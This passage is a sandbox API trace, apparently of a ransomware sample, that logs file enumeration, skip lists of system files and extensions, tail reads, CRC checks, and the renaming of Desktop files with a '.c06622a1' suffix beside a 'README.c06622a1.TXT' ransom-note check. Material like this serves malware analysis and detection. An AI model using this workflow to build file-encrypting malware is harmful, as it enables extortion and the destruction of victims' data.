0x3 [0156.881] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0156.881] wcslen (_String="adv") returned 0x3 [0156.881] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0156.881] wcslen (_String="ani") returned 0x3 [0156.881] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0156.881] wcslen (_String="bat") returned 0x3 [0156.882] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0156.882] wcslen (_String="bin") returned 0x3 [0156.882] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0156.882] wcslen (_String="cab") returned 0x3 [0156.882] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0156.882] wcslen (_String="cmd") returned 0x3 [0156.882] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0156.882] wcslen (_String="com") returned 0x3 [0156.882] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0156.882] wcslen (_String="cpl") returned 0x3 [0156.882] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0156.882] wcslen (_String="cur") returned 0x3 [0156.882] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0156.882] wcslen (_String="deskthemepack") returned 0xd [0156.882] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0156.882] wcslen (_String="diagcab") returned 0x7 [0156.882] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0156.882] wcslen (_String="diagcfg") returned 0x7 [0156.882] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0156.882] wcslen (_String="diagpkg") returned 0x7 [0156.882] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0156.882] wcslen (_String="dll") returned 0x3 [0156.882] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0156.882] wcslen (_String="drv") returned 0x3 [0156.882] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0156.882] wcslen (_String="exe") returned 0x3 [0156.882] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0156.882] wcslen (_String="hlp") returned 0x3 [0156.882] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0156.882] wcslen (_String="icl") returned 0x3 [0156.882] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0156.883] wcslen (_String="icns") returned 0x4 [0156.883] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0156.883] wcslen (_String="ico") returned 0x3 [0156.883] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0156.883] wcslen (_String="ics") returned 0x3 [0156.883] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0156.883] wcslen (_String="idx") returned 0x3 [0156.883] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0156.883] wcslen (_String="ldf") returned 0x3 [0156.883] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0156.883] wcslen (_String="lnk") returned 0x3 [0156.883] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0156.883] wcslen (_String="mod") returned 0x3 [0156.883] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0156.883] wcslen (_String="mpa") returned 0x3 [0156.883] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0156.883] wcslen (_String="msc") returned 0x3 [0156.883] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0156.883] wcslen (_String="msp") returned 0x3 [0156.883] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0156.883] wcslen (_String="msstyles") returned 0x8 [0156.883] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0156.883] wcslen (_String="msu") returned 0x3 [0156.883] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0156.883] wcslen (_String="nls") returned 0x3 [0156.883] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0156.883] wcslen (_String="nomedia") returned 0x7 [0156.884] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0156.884] wcslen (_String="ocx") returned 0x3 [0156.884] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0156.884] wcslen (_String="prf") returned 0x3 [0156.884] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0156.884] wcslen (_String="ps1") returned 0x3 [0156.884] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0156.884] wcslen (_String="rom") returned 0x3 [0156.884] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0156.884] wcslen (_String="rtp") returned 0x3 [0156.884] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0156.884] wcslen (_String="scr") returned 0x3 [0156.884] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0156.884] wcslen (_String="shs") returned 0x3 [0156.884] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0156.884] wcslen (_String="spl") returned 0x3 [0156.884] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0156.884] wcslen (_String="sys") returned 0x3 [0156.884] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0156.884] wcslen (_String="theme") returned 0x5 [0156.884] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0156.884] wcslen (_String="themepack") returned 0x9 [0156.884] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0156.884] wcslen (_String="wpx") returned 0x3 [0156.884] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0156.884] wcslen (_String="lock") returned 0x4 [0156.884] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0156.884] wcslen (_String="key") returned 0x3 [0156.884] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0156.884] wcslen (_String="hta") returned 0x3 [0156.884] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0156.885] wcslen (_String="msi") returned 0x3 [0156.885] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0156.885] wcslen (_String="pdb") returned 0x3 [0156.885] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0156.885] wcslen (_String="sqlite") returned 0x6 [0156.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.885] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.885] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.885] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.885] wcscpy (in: _Dest=0x32400ca, _Source="UnXbhzP45298tM0kFv.wav" | out: _Dest="UnXbhzP45298tM0kFv.wav") returned="UnXbhzP45298tM0kFv.wav" [0156.885] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav", dwFileAttributes=0x80) returned 1 [0156.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\unxbhzp45298tm0kfv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0156.885] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.885] ReadFile (in: hFile=0x1c0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.886] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xefca698f [0156.886] RtlComputeCrc32 (PartialCrc=0x698f, Buffer=0x32e9a4, Length=0x80) returned 0x540d54b7 [0156.886] RtlComputeCrc32 (PartialCrc=0x54b7, Buffer=0x32e9a4, Length=0x80) returned 0x9fb99a11 [0156.886] RtlComputeCrc32 (PartialCrc=0x9a11, Buffer=0x32e9a4, Length=0x80) returned 0xfb93af6d [0156.886] RtlComputeCrc32 (PartialCrc=0xaf6d, Buffer=0x32e9a4, Length=0x80) returned 0xf9f8979e [0156.886] CloseHandle (hObject=0x1c0) returned 1 [0156.886] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.886] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav" [0156.886] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav") returned 0x4b [0156.887] wcscpy (in: _Dest=0x32500fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.887] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\unxbhzp45298tm0kfv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\unxbhzp45298tm0kfv.wav.c06622a1"), dwFlags=0x8) returned 1 [0156.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\UnXbhzP45298tM0kFv.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\unxbhzp45298tm0kfv.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0156.889] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.889] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x513fe31d [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x49491df6 [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4203bb1d [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7c8cd390 [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62c4c0ea [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ecda6c1 [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x472c3048 [0156.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60d42077 [0156.900] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0xe5bdf670 [0156.900] RtlComputeCrc32 (PartialCrc=0xf670, Buffer=0x37e0094, Length=0x80) returned 0x4883492 [0156.900] RtlComputeCrc32 (PartialCrc=0x3492, Buffer=0x37e0094, Length=0x80) returned 0xd3ed807 [0156.900] RtlComputeCrc32 (PartialCrc=0xd807, Buffer=0x37e0094, Length=0x80) returned 0xddf2fa9b [0156.900] RtlComputeCrc32 (PartialCrc=0xfa9b, Buffer=0x37e0094, Length=0x80) returned 0x7b24e992 [0156.900] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0156.900] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.900] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.900] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x575ec7b0, ftCreationTime.dwHighDateTime=0x1d5df98, ftLastAccessTime.dwLowDateTime=0x43ed83e0, ftLastAccessTime.dwHighDateTime=0x1d5dc3e, ftLastWriteTime.dwLowDateTime=0x43ed83e0, ftLastWriteTime.dwHighDateTime=0x1d5dc3e, nFileSizeHigh=0x0, nFileSizeLow=0xba27, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgSGXoahJBicS4.swf", cAlternateFileName="WGSGXO~1.SWF")) returned 1 [0156.900] _wcsicmp (_Str1="wgSGXoahJBicS4.swf", _Str2="README.c06622a1.TXT") returned 5 [0156.900] wcsstr (_Str="wgSGXoahJBicS4.swf", _SubStr="README") returned 0x0 [0156.900] _wcsicmp (_Str1="autorun.inf", _Str2="wgSGXoahJBicS4.swf") returned -22 [0156.900] wcslen (_String="autorun.inf") returned 0xb [0156.900] _wcsicmp (_Str1="boot.ini", _Str2="wgSGXoahJBicS4.swf") returned -21 [0156.900] wcslen (_String="boot.ini") returned 0x8 [0156.900] _wcsicmp (_Str1="bootfont.bin", _Str2="wgSGXoahJBicS4.swf") returned -21 [0156.900] wcslen (_String="bootfont.bin") returned 0xc [0156.900] _wcsicmp (_Str1="bootsect.bak", _Str2="wgSGXoahJBicS4.swf") returned -21 [0156.900] wcslen (_String="bootsect.bak") returned 0xc [0156.900] _wcsicmp (_Str1="desktop.ini", _Str2="wgSGXoahJBicS4.swf") returned -19 [0156.900] wcslen (_String="desktop.ini") returned 0xb [0156.900] _wcsicmp (_Str1="iconcache.db", _Str2="wgSGXoahJBicS4.swf") returned -14 [0156.900] wcslen (_String="iconcache.db") returned 0xc [0156.900] _wcsicmp (_Str1="ntldr", _Str2="wgSGXoahJBicS4.swf") returned -9 [0156.900] wcslen (_String="ntldr") returned 0x5 [0156.900] _wcsicmp (_Str1="ntuser.dat", _Str2="wgSGXoahJBicS4.swf") returned -9 [0156.900] wcslen (_String="ntuser.dat") returned 0xa [0156.900] _wcsicmp (_Str1="ntuser.dat.log", _Str2="wgSGXoahJBicS4.swf") returned -9 [0156.900] wcslen (_String="ntuser.dat.log") returned 0xe [0156.901] _wcsicmp (_Str1="ntuser.ini", _Str2="wgSGXoahJBicS4.swf") returned -9 [0156.901] wcslen (_String="ntuser.ini") returned 0xa [0156.901] _wcsicmp (_Str1="thumbs.db", _Str2="wgSGXoahJBicS4.swf") returned -3 [0156.901] wcslen (_String="thumbs.db") returned 0x9 [0156.901] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.901] wcslen (_String="386") returned 0x3 [0156.901] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.901] wcslen (_String="adv") returned 0x3 [0156.901] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.901] wcslen (_String="ani") returned 0x3 [0156.901] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.901] wcslen (_String="bat") returned 0x3 [0156.901] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.901] wcslen (_String="bin") returned 0x3 [0156.901] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.901] wcslen (_String="cab") returned 0x3 [0156.901] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.901] wcslen (_String="cmd") returned 0x3 [0156.901] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.901] wcslen (_String="com") returned 0x3 [0156.901] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.901] wcslen (_String="cpl") returned 0x3 [0156.901] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.901] wcslen (_String="cur") returned 0x3 [0156.901] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.901] wcslen (_String="deskthemepack") returned 0xd [0156.901] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.901] wcslen (_String="diagcab") returned 0x7 [0156.901] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.901] wcslen (_String="diagcfg") returned 0x7 [0156.901] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.902] wcslen (_String="diagpkg") returned 0x7 [0156.902] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.902] wcslen (_String="dll") returned 0x3 [0156.902] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.902] wcslen (_String="drv") returned 0x3 [0156.902] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.902] wcslen (_String="exe") returned 0x3 [0156.902] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.902] wcslen (_String="hlp") returned 0x3 [0156.902] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.902] wcslen (_String="icl") returned 0x3 [0156.902] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.902] wcslen (_String="icns") returned 0x4 [0156.902] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.902] wcslen (_String="ico") returned 0x3 [0156.902] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.902] wcslen (_String="ics") returned 0x3 [0156.902] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.902] wcslen (_String="idx") returned 0x3 [0156.902] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.902] wcslen (_String="ldf") returned 0x3 [0156.902] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.902] wcslen (_String="lnk") returned 0x3 [0156.902] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.902] wcslen (_String="mod") returned 0x3 [0156.902] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.902] wcslen (_String="mpa") returned 0x3 [0156.902] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.902] wcslen (_String="msc") returned 0x3 [0156.902] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.902] wcslen (_String="msp") returned 0x3 [0156.902] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.902] wcslen (_String="msstyles") returned 0x8 [0156.903] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.903] wcslen (_String="msu") returned 0x3 [0156.903] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.903] wcslen (_String="nls") returned 0x3 [0156.903] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.903] wcslen (_String="nomedia") returned 0x7 [0156.903] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.903] wcslen (_String="ocx") returned 0x3 [0156.903] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.903] wcslen (_String="prf") returned 0x3 [0156.903] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.903] wcslen (_String="ps1") returned 0x3 [0156.903] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.903] wcslen (_String="rom") returned 0x3 [0156.903] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.903] wcslen (_String="rtp") returned 0x3 [0156.903] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.903] wcslen (_String="scr") returned 0x3 [0156.903] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.903] wcslen (_String="shs") returned 0x3 [0156.903] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.903] wcslen (_String="spl") returned 0x3 [0156.903] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.903] wcslen (_String="sys") returned 0x3 [0156.903] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.903] wcslen (_String="theme") returned 0x5 [0156.903] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.903] wcslen (_String="themepack") returned 0x9 [0156.903] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.903] wcslen (_String="wpx") returned 0x3 [0156.903] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.903] wcslen (_String="lock") returned 0x4 [0156.904] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.904] wcslen (_String="key") returned 0x3 [0156.904] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.904] wcslen (_String="hta") returned 0x3 [0156.904] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.904] wcslen (_String="msi") returned 0x3 [0156.904] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.904] wcslen (_String="pdb") returned 0x3 [0156.904] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.904] wcslen (_String="sqlite") returned 0x6 [0156.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.904] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.904] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.904] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.904] wcscpy (in: _Dest=0x32400ca, _Source="wgSGXoahJBicS4.swf" | out: _Dest="wgSGXoahJBicS4.swf") returned="wgSGXoahJBicS4.swf" [0156.904] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf", dwFileAttributes=0x80) returned 1 [0156.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\wgsgxoahjbics4.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0156.904] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.905] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.905] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xa4fc9c40 [0156.905] RtlComputeCrc32 (PartialCrc=0x9c40, Buffer=0x32e9a4, Length=0x80) returned 0x895dcbd4 [0156.905] RtlComputeCrc32 (PartialCrc=0xcbd4, Buffer=0x32e9a4, Length=0x80) returned 0xbf83348c [0156.905] RtlComputeCrc32 (PartialCrc=0x348c, Buffer=0x32e9a4, Length=0x80) returned 0xde44ca91 [0156.905] RtlComputeCrc32 (PartialCrc=0xca91, Buffer=0x32e9a4, Length=0x80) returned 0x6464ca5f [0156.905] CloseHandle (hObject=0x1a0) returned 1 [0156.906] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.906] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf" [0156.906] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf") returned 0x47 [0156.906] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.906] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\wgsgxoahjbics4.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\wgsgxoahjbics4.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\wgSGXoahJBicS4.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\wgsgxoahjbics4.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0156.908] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.908] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3870020 [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25ec4843 [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d62d09b [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x756a9a2b [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f0b7927 [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f9c74b6 [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x590411ab [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c192991 [0156.916] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x545f5383 [0156.919] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3870094, Length=0x80) returned 0x2b1bd0fc [0156.919] RtlComputeCrc32 (PartialCrc=0xd0fc, Buffer=0x3870094, Length=0x80) returned 0x99ccd47b [0156.919] RtlComputeCrc32 (PartialCrc=0xd47b, Buffer=0x3870094, Length=0x80) returned 0xef1e86bf [0156.919] RtlComputeCrc32 (PartialCrc=0x86bf, Buffer=0x3870094, Length=0x80) returned 0xbc6b89d9 [0156.919] RtlComputeCrc32 (PartialCrc=0x89d9, Buffer=0x3870094, Length=0x80) returned 0x7eacdcb8 [0156.919] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0156.919] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.919] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.919] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x560f2710, ftCreationTime.dwHighDateTime=0x1d5e065, ftLastAccessTime.dwLowDateTime=0xa1c77190, ftLastAccessTime.dwHighDateTime=0x1d5daa1, ftLastWriteTime.dwLowDateTime=0xa1c77190, ftLastWriteTime.dwHighDateTime=0x1d5daa1, nFileSizeHigh=0x0, nFileSizeLow=0xe216, dwReserved0=0x0, dwReserved1=0x0, cFileName="YAg4SbqQt.avi", cAlternateFileName="YAG4SB~1.AVI")) returned 1 [0156.919] _wcsicmp (_Str1="YAg4SbqQt.avi", _Str2="README.c06622a1.TXT") returned 7 [0156.919] wcsstr (_Str="YAg4SbqQt.avi", _SubStr="README") returned 0x0 